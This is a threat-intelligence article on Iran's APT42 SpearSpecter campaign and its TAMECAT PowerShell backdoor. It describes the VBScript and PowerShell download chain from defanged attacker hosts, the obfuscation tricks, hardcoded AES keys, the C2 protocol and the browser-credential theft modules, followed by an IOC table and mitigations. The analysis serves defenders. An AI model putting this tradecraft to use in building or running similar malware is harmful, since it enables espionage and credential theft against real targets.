Iranian hackers from APT42 are ramping up their SpearSpecter espionage campaign, deploying the TAMECAT PowerShell backdoor to steal browser credential and sensitive data from high profile targets.
Recent analysis from Israel’s National Digital Agency reveals how this modular malware evades detection while targeting defense officials through sophisticated social engineering.
Campaign Overview
APT42, tied to Iran’s Islamic Revolutionary Guard Corps Intelligence Organization, builds long-term trust with victims posing as journalists or event organizers before delivering payloads.
In the SpearSpecter operation, they tailor attacks: low-value targets hit fake login pages, while elites get TAMECAT for persistent access via spear-phishing links or LNK files.
The group has used this against Western NGOs, media, Israeli defense personnel, and government figures since at least 2021, focusing on Iran-related intelligence.
Once rapport forms are submitted, victims sometimes receive lures such as conference invitations or documents hosted on attacker-controlled cloud services.
Clicking leads to credential theft or direct malware drops. TAMECAT stands out for its flexibility, using HTTPS, Discord, or Telegram for C2 to dodge blocks.
Initial Infection Chain
Attacks often start with a VBScript downloader, such as the sample with the SHA256 hash 5404e39f2f175a0fc993513ee52be3679a64c69c79e32caa656fbb7645965422.
This script queries WMI for installed AV products. If “Windows” appears (hinting at Defender), it launches conhost to run a hidden PowerShell script that uses wget to pull nconf.txt from hxxps://s3[.]tebi[.]io/icestorage/config/nconf[.]txt.
Otherwise, it falls back to cmd.exe and curl for a secondary payload, often dead at analysis time.
The PowerShell loader (MD5: 081419a484bbf99f278ce636d445b9d8) unpacks via obfuscation: arrays are concatenated to form commands, which are executed with tricks like gcm e-e?p for Invoke-Expression.
It spoofs a Chrome 119 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36.
Next, it retrieves df32s.txt from the same Tebi.io bucket, truncating the first 3 Base64 bytes of the URL.
This content undergoes bitwise NOT on bytes, string extraction from position 24, and UTF-8 conversion to yield an AES decryptor function.
Core Backdoor Mechanics
The loader’s Gorba function stores Base64+AES-encrypted blobs: $te12 is a massive ciphertext, and $k12ey is T2r0y1M1e1n1o0w1, matching Volexity’s PowerStar rules.
AES params include 256-bit key kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B and IV like 0T9r1y1M2e0N0o1w.
Decrypted code defines Borjol (Base64-decode then AES), Borpos (AES-encrypt), x (Base64-to-UTF8), and xs (a random 16-char IV from a-zA-Z).
TAMECAT writes a victim ID (e.g., GILNH9LX6TCZ9V8ZZSUF) to %LocalAppData%\config.txt and creates the Chrome subdir.
It beacons OS details and ComputerName to hxxps://accurate-sprout-porpoise[.]glitch[.]me via POST, with AES-encrypted data (fixed key, random IV in the Content-DPR header) Base64-wrapped.
C2 responses split by ¶ into language (PowerShell/C#), base64 command, ThreadName, StartStop (start=download/execute, stop=terminate).
Commands enable modularity: browser credential grabs from Edge (remote debugging) and Chrome (suspend process), screenshots every 15s, Outlook mailbox dumps, and file harvests by extension. Exfil over HTTPS/FTP or C2 channels.
Evasion and Persistence
TAMECAT lives in-memory, leverages living-off-the-land like WMI, native PowerShell/cmd.
Obfuscation includes array fragments, wildcards, and string replacements. C2 via glitch.me (ephemeral), Tebi.io S3, bots on Telegram/Discord for dynamic cmds that trigger per-victim actions when users’ messages match specific triggers.
AV checks dictate loaders; no disk drops beyond config.txt. Symmetric crypto (AES-256-CBC) with hardcoded keys hides payloads; IV rotation per session foils static sigs. Ties to MITRE: T1059.001 (PS), T1047 (WMI), T1027.013 (obfuscated PS), T1573.001 (encrypted C2).
| Type | Indicator | Description cloud.google+2 |
|---|---|---|
| SHA256 | 5404e39f2f175a0fc993513ee52be3679a64c69c79e32caa656fbb7645965422 | VBS downloader |
| MD5 | d7bf138d1aa2b70d6204a2f3c3bc72a7 | VBS sample |
| MD5 | 081419a484bbf99f278ce636d445b9d8 | nconf.txt loader |
| SHA256 | bd1f0fb085c486e97d82b6e8acb3977497c59c3ac79f973f96c395e7f0ca97f8 | Loader variant |
| URL | hxxps://s3[.]tebi[.]io/icestorage/config/nconf[.]txt | Loader host |
| URL | hxxps://s3[.]tebi[.]io/icestorage/df32s[.]txt | Decryptor |
| URL | hxxps://accurate-sprout-porpoise[.]glitch[.]me | Primary C2 |
| Path | %LocalAppData%\config.txt | Victim ID drop |
| Key | kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B | AES key |
| Header | Content-DPR | IV carrier |
Technical Mitigations
Hunt wscript spawning PS/cmd, anomalous wget/curl from VBS, Tebi.io traffic with Chrome UA.
Enable PS script-block logging, constrain execution policy to SignedOnly, and restrict PS to admins. EDR for process chains, WMI monitors; block glitch.me, Tebi.io IOCs.
User training on rapport-building phish (fake invites); MFA everywhere, no app passwords. YARA from Mandiant/Volexity catches loaders. For browsers, monitor Edge debugging ports and Chrome suspensions.(Source)
%20(1).webp "Technitium: Self-Hosted DNS Server for Enhanced Privacy and Security")
